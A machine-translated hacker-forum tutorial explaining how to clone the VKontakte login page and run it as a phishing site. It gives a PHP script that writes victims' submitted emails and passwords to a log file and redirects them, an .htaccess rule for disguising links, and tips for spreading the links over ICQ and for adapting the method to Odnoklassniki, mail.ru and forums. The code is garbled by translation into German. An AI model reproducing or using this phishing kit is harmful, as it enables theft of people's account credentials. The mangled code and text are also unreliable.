This page has been robot translated, sorry for typos if any. Original content here.

Fälschung in Eile

[iNtrO]

Um es zu tun war nichts, es war am Abend .... Eigentlich war mein erster Artikel (der erste über Anti-Chat), dass ich in der Rubrik Buy / Sell / Exchange / Throw auf ein großes Thema hingezogen wurde, in dem ein hekker prodoval feyki schon auf ist 10 vmz, und oft gebeten, diese oder jene Fälschung zu schaffen ...
Ich werde dir einen Artikel erzählen, wie du mit einer universellen Fälschung fast alles, was entführt wurde, anfassen kannst! Ich werde am Beispiel von gefälschten vkontakte zeigen.

[SeeRechINg]

Und so, 1 was wir brauchen, ist eine Ressource auszuwählen und alle Informationen zu sammeln, die wir brauchen, aber wir brauchen nur eine Kopie von einigen Seiten.Wir gehen zu vkontakte.ru durch Operu (!) . Wir drücken den Knopf, wir geben login.pxp ein, wir nehmen es für den Index unserer Fälschung. Wir drücken in der Oper: Fail -> Speichern unter -> Im geöffneten Dialog unter dem Namen wählen wir (standardmäßig gibt es ein Webarchiv ....) " HTML Fail mit Bildern ", und das Diagramm ist erforderlich Dateiname schreiben Index (oder login.htm - abhängig von der Seite)


Weiter geben wir dort unwirkliche Daten ein und wir kommen zu der Seite, auf der es geschrieben ist
Eine solche Postanschrift ist nicht registriert oder das Passwort ist falsch.
Wir speichern es auf die gleiche Weise, nur statt Index schreiben wir schlecht .
Als nächstes fahren wir in Google.ru den Ausdruck Vkontakte.ru, klicken Sie auf Zusätzliche Ergebnisse mit vkontakte.ru » und suchen Sie nach etwas im Zusammenhang mit dem Kontakt eroy ... Auf der zweiten Seite fand ich VKontakte | Fehler (http://vkontakte.ru/blank.php?code=10)- denken Sie daran, wir brauchen diesen Link
Usa, alles, was wir für feyka aus der Ressource brauchen, haben wir bereits.

[CoDiNg]

Steuern, jetzt verwenden wir das Login-Formular. Öffnen Sie unsere index.html und suchen Sie nach dem Login-Formular.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "hidden" name = "success_url" id = "success_url" value = "">
  <input type = "hidden" name = "fail_url" id = "fail_url" value = "">

  <input type = "hidden" name = "try_to_login" id = "try_to_login" Wert = "1">
  <table align = "centre" cellpadding = 0 Zellenabstand = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "grau"> E-Mail: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "grey"> Passwort: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "passwort" name = "pass" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "margin-top: 1px; vertikal-align: mitte;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <kleiner> Alien Computer </ small>

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
Von hier merken wir 3 Dinge:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "passwort" name = " pass " value = "" id = "pass" size = "25" />
In diesen 3 Dingen liegt der erste Teil der Einzigartigkeit, in jedem sozialen Netzwerk oder emily oder anderswo, überall wird die Form des Inputs (Felds) in dieser Art sein (na ja, nur die Namen der Felder wecken), zum Beispiel bei Klassenkameraden
<Eingabe-ID = "Feld_Kennwort" Wert = "" Stil = "Breite: 170px;" type = "password" size = "20" name = " st.password ">
Dh einfach den Namen der Felder unterscheiden, Design-Elemente, aber die Funktion ist für alle gleich.
Jetzt erstellen wir eine PHP-Datei, und wir nennen es login.php , deren Inhalt:

PHP-Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+))((([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'password' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'password' ]. " \ n " );
Kopfzeile ( "Ort: http: //" );
} sonst {
Kopfzeile ( "Ort: http: //" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Schau dir das Skript an, ein paar Strings, aber das ist ganz normal gefälscht, seine Funktionalität:
Speichern der übertragenen Variablen, Prüfen, Umleiten abhängig von der Verifikation.

Und jetzt kehren wir zu diesen 3 Zeilen zurück:
<form method = "post" name = "login" id = "login" action = " login.php ">
Hier haben wir alles in Ordnung, der Name unseres Skripts stimmt mit dem Namen überein, es stimmt nicht überein, dann ersetzen wir es oder benennen es um.
<input class = "inputText" type = "text" name = "email" value = "" id = "email" size = "25" />
<input class = "inputText" type = "passwort" name = "pass" value = "" id = "pass" size = "25" />
Von hier aus brauchen wir name = " email " und name = " pass "
Wir fügen sie an der richtigen Stelle in unser Skript ein
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+))((([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
Kopfzeile ( "Ort: http: //" );
} sonst {
Kopfzeile ( "Ort: http: //" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Wer es nicht bemerkt hat, es ist $ _POST ['email'] und $ _POST ['pass']

Als nächstes schauen Sie sich das Skript an, dann erscheint die IF ELSE-Funktion, und wenn es ein E-Mail-Feld ist, das der E-Mail entspricht (nickname@mylo.ru, und nicht, wie die Nachricht gesendet wird) und das Passwortfeld nicht leer ist, wird die erste Umleitung ausgeführt, aber wenn die Email nicht passt oder das Passfeld ist leer, dann ist das zweite die Umleitung. Daraus folgt, dass, wenn der Chell Seife eingegeben und so ähnlich wie der Pass, dann wir es auf die Seite mit der erotischen http://vkontakte.ru/blank.php?code=10 werfen, und wenn ich den Müll (hier wir brauchten es) Kopie der Seite bad.html? wenn wir die falschen Daten eingegeben haben, dann wirf es zurück, ich gebe bad.htm ein.

PHP-Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+))((([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i " , $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'pass' ]. " \ n " );
Kopfzeile ( "Location: http://vkontakte.ru/blank.php?code=10" );
} sonst {
Kopfzeile ( "Location: bad.htm" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Wir speichern all den Mist auf dem Server (login.php, index.htm + Ordner mit Dateien, bad.htm + Ordner mit Dateien), erstellen Sie log.txt Datei (ich rate meinen eindeutigen Namen zu kommen. Vergessen Sie nicht, in das Skript zu ändern), auf er chmod777.

3) ein kleines Update ...

Dieses Update eignet sich sehr gut für SI, im ftp-Stammverzeichnis erstellen wir eine .htaccess- Datei mit folgendem Inhalt:

RewriteEngine Ein
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ACHTUNG !!!
! index \ .htm- Diese Weiterleitung wird referenziert, wenn Sie eine gefälschte login.html haben. dann müssen Sie den Index im Login entsprechend umbenennen.

Steuer, diese Datei gibt uns einen Link mehr qualitativ gasartig, nämlich:
Ihr / jeder Text, wenn Sie die Link-Struktur der gefälschten, zum Beispiel Kontakt kennen, können wir dies tun:


yourfake.ro/ photos.php? act = anzeigen & id = 15884695_588954334 & uid = 359648756 & self = 6
und vparit es auf ICQ))) zustimmen. weniger sichtbar jetzt gefälscht))

Das ist alles

[Der EnD] Eigentlich ist das einzigartig, aber die Tatsache, dass Sie zu Klassenkameraden gehen können, speichern Sie auch die Seite, geben Sie Variablen ein, URLs ersetzen (hier gebe ich sofort http://odnoklassniki.ru/dk?st.cmd=error) und alles, absolut genauso Gehe auf mayile.ru, speichere Variablen und ersetze und alle))) Das Einzige, was du vielleicht brauchst, ist Kreativität, wir speichern nicht die Hauptseite, sondern die Login-Seite, du kannst auch jedes Forum machen, wenn du ein acc ( Sende an PM
<a href="file"> Link zu einem Thema </a>
und in der Fälschung geben Sie dieses Thema für die Weiterleitung an.